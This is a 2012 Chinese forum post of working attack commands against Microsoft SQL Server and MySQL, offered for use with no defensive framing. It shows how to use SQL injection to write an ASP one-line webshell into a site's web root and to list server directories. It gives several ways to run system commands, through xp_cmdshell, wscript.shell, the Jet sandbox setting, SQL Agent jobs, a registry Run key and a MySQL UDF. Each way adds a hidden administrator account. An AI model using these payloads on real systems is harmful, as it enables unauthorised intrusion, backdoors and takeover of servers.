找回密码
 立即注册
查看: 3557|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
MSSQL语句导出一句话木马& m  J2 C! n) M' Z7 g
首先确定网站的WEB路径3 a3 |0 @+ |3 [' A
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马2 r2 t) }7 H0 I' B3 V3 X1 K' o# R0 H

( p1 B8 [; t: K7 \. Z5 p4 V+ I;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
# B$ I5 |- f; D* P/ l+ Z# `2 _# r8 u//将一句话木马插入表中
$ S$ D4 i- T3 t9 Q7 n- \
/ _+ r6 A$ W1 T9 q;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- ) h5 r9 b) J  S. m3 b# t
//导出一个ASP文件
; }0 P  X8 @  F& a# X- l1 S/ O5 r6 v: {
, f5 `3 f2 t- R& J
关于MSSQL列目录8 l5 v+ q5 X/ m" O* _
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表) O6 t) R% ~- ^# J6 T
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表& J" ]) W5 j/ O- k/ r- O1 `

4 J! S& L! W* ]' xand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录! ~% \0 M: h; d: X  f0 J

3 T. h8 B5 b, v, E2 W9 T0 D/ lAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
2 K! |2 p0 ^: O2 _+ E- i6 d3 Q8 ~- Y! C$ q' X
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符* P  _3 a: e$ O& u
. ~4 f. x2 i8 ^) Q
+ Y. e% |1 r6 b, }+ E$ Y0 R  j
数据库版本和权限查看
$ D+ @3 S/ T1 {+ ~+ V+ N* Y7 sand 1=(select @@VERSION) //查看详细的数据库信息.
& Q: h# i+ r: P2 Z  ]# ]and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
% O2 j! r* V7 A. dand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER/ A2 C) J: v/ s& `2 i$ E
  I, ?% `( j# ^0 e6 [
7 A2 d* N/ H" l$ ^: X+ x
1.利用xp_cmdshell执行命令
0 W0 e( p( z( k7 I$ X* o( o+ rexec master..xp_cmdshell 'net user rfire 123456 /add'
! ~; y) N# }6 ?" Z- }. }6 ^exec master..xp_cmdshell 'net localgroup administrators rfire /add'
2 K* D& I( @6 J8 X6 K& h! \1 F3 @+ h/ V+ Q: N! s5 {
恢复xp_cmdshell存储过程9 _: v% [3 h7 q$ Y4 _
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
2 f: _2 e0 D" g0 |  ^' `9 e; d, v% N+ q3 a" @' W6 A

; ]) s$ N/ r5 C6 |' @- d" [3 n! m2.利用SP_OAcreate和SP_OAMETHOD执行命令
% [* u$ |8 i5 U) [在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下# ^1 o2 R+ |/ \
DECLARE @shell INT //建立一个@shell实体& B9 ~* ]9 T3 r% b  \  A& N% E& x
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
' Z' M# t2 y8 h) Z+ PEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
$ [; A. X3 Y! {2 ~- T. {& X# c' C! N% y# I' a
7 s) w5 I& o& j
3.利用沙盒模式
  `8 s6 D: G# Z, D$ f, c先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。' N1 y+ T0 F. }3 {, F8 @: I
开启沙盒模式:$ X: g  p" a# N, N: k- \, M, j
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
: W3 P/ F! T% F+ ?3 Q0 y6 f6 _4 d. L% `
执行命令:% M( o! H8 G4 c- ~: K' f
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');  H6 B' V' k4 {& T, T7 `

/ l. v9 k5 O, c$ H6 f5 c/ Q: {2 H- D
4.利用SQL代理执行命令; Y/ `* i1 s4 z/ ~& j
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务3 u; N4 ]  Z) k% u

; `: \6 k0 q0 `6 |/ F8 l2 y执行命令:
$ }% l6 Q% x- F1 C) F+ Luse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错. J0 t7 p9 x/ j  V5 Y: p
exec sp_add_job 'x'4 V/ X: e3 }1 r/ r4 b* b
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
3 h# i/ m+ ^* `  J$ ?' |exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业5 m/ E2 b9 U( I

- z4 N) O/ M8 n( [. k/ j
' T5 v" O$ n" H' f5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
0 l# R8 F* ~0 O8 B: x& p$ q" G" jEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
7 Q/ v' Y# n% a% g% A, J! y$ w2 S; ~3 ~, L" A* O. ~1 B

8 P- n3 [- w, Y6 [# ?0 Y& `! T6.MYSQL的命令执行0 V# l  f  k) `" }
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
, Q( d) {* \" {5 ?首先要在su.php下导出c:\windows\udf.dll
: g( w) K# z/ V导出后执行创建自定义函数命令:
8 T6 M" i) G  B& E; UCreate Function cmdshell returns string soname 'udf.dll'; J3 A1 z: D, i/ Q! R
执行命令
  x5 v' A# L9 x! ]6 Iselect cmdshell('net user rfire 123456 /add')
. J' D* k6 D1 _8 y, V* u% C0 o执行后删除函数 drop function cmdshell% O' u2 x& t* m3 O1 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表